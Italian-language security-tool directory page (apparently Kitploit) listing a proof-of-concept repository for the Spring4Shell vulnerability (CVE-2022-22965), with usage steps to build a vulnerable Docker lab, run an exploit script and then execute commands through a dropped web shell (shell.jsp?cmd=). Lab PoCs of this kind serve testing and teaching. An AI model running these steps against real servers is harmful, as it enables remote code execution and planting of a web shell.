Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-22965-Spring4Shell — PoC ed exploit per CVE-2022-22965 Spring4Shell | Kitploit
Strumenti/GitHubGitHub/jakabakos/cve-2022-22965-spring4shell
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubjakabakos/cve-2022-22965-spring4shell

CVE-2022-22965-Spring4Shell

PoC ed exploit per CVE-2022-22965 Spring4Shell

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
223 anni faNon ancora revisionato

Spring4Shell

Spring4Shell (CVE-2022-22965) Proof Of Concept con un server Tomcat vulnerabile e un'applicazione spring4shell vulnerabile.

Dettagli su questa vulnerabilità

  • https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc
  • https://www.springcloud.io/post/2022-03/spring-0day-vulnerability
  • https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement

Come usare

Costruisci l'immagine

root@kitploit:~
docker build . -t spring4shell

Esegui il container

root@kitploit:~
docker run -p 80:8080 spring4shell

Puoi anche eseguirlo con la porta del debugger esposta, se necessario:

root@kitploit:~
docker run -p 80:8080 –p 5005:5005 spring4shell

Consulta il post originale del blog per i dettagli sulla configurazione di un debugger remoto in IntelliJ Idea!

Esegui l'exploit

root@kitploit:~
./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell

Poi puoi eseguire qualsiasi comando da remoto in questo modo:

root@kitploit:~
curl http://localhost/spring4shell/shell.jsp?cmd=id --output -

...oppure visitando l'URL sopra.

Scarica lo strumento